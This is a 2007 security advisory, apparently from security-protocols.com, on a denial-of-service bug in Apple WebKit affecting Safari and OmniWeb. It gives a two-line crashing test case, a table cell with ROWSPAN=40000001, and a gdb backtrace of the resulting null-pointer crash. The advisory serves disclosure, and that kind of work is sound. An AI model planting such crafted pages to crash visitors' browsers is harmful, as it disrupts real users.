Apple OS X WebKit WebCore::ArrayImpl "ROWSPAN" DoS

Release Date:
January 14th, 2007

Severity:
Low

Vendor:
Apple

Versions Affected:
Apple OS X 10.4.8
Safari 2.0.4 (419.3)
WebKit build 18794
OmniWeb 5.5.3

Overview:
A denial of service (null pointer) vulnerability exists within WebKit which allows for an attacker to post a specially crafted .html page causing the application to crash. This is basiclly a follow up to another flaw which was reported by Yannick von Arx, that was fixed in the latest build of WebKit but was not fixed in Safari.

Technical Details:
Below is a testcase to reproduce this issue:

TABLE
TD ROWSPAN=40000001

Below is the crash triggered on OSX 10.4.8 agaisnt OmniWeb 5.5.3:

Program received signal EXC_BAD_ACCESS, Could not access memory.
Reason: KERN_PROTECTION_FAILURE at address: 0x00000000
0x3456fbee in WebCore::ArrayImpl::ArrayImpl ()
(gdb) bt
#0 0x3456fbee in WebCore::ArrayImpl::ArrayImpl ()
#1 0x34636a28 in WebCore::RenderTableSection::ensureRows ()
#2 0x34637417 in WebCore::RenderTableSection::addCell ()
#3 0x34638b20 in WebCore::RenderTableRow::addChild ()
#4 0x3456042b in WebCore::NodeImpl::createRendererIfNeeded ()
#5 0x3448a1a0 in WebCore::ElementImpl::attach ()
#6 0x3447ec73 in WebCore::HTMLParser::insertNode ()
#7 0x3447f210 in WebCore::HTMLParser::handleError ()
#8 0x3447ec4c in WebCore::HTMLParser::insertNode ()
#9 0x3447f210 in WebCore::HTMLParser::handleError ()
#10 0x3447ec4c in WebCore::HTMLParser::insertNode ()
#11 0x34481402 in WebCore::HTMLParser::parseToken ()
#12 0x34482732 in WebCore::HTMLTokenizer::processToken ()
#13 0x344867de in WebCore::HTMLTokenizer::parseTag ()
#14 0x344884fb in WebCore::HTMLTokenizer::write ()
#15 0x34533ae0 in WebCore::Frame::write ()
== snip ==

Solution:
Get Firefox!

Discovered by:
Tom Ferris
tommy[at]security-protocols[dot]com

Related Links:
http://security-protocols.com/poc/sp-x41.html
http://security-protocols.com/sp-x41-advisory.php
http://nightly.webkit.org
http://developer.apple.com/opensource/internet/webkit.html
http://omnigroup.com/applications/omniweb/

Security-Protocols.com :: 1999-2008